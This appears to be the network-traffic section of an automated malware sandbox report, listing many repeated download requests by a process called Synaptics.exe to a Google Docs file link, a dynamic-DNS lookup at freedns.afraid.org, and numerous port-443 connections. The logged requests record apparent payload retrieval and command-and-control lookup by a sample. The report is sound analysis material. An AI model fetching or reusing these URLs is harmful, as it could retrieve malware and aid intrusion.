                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
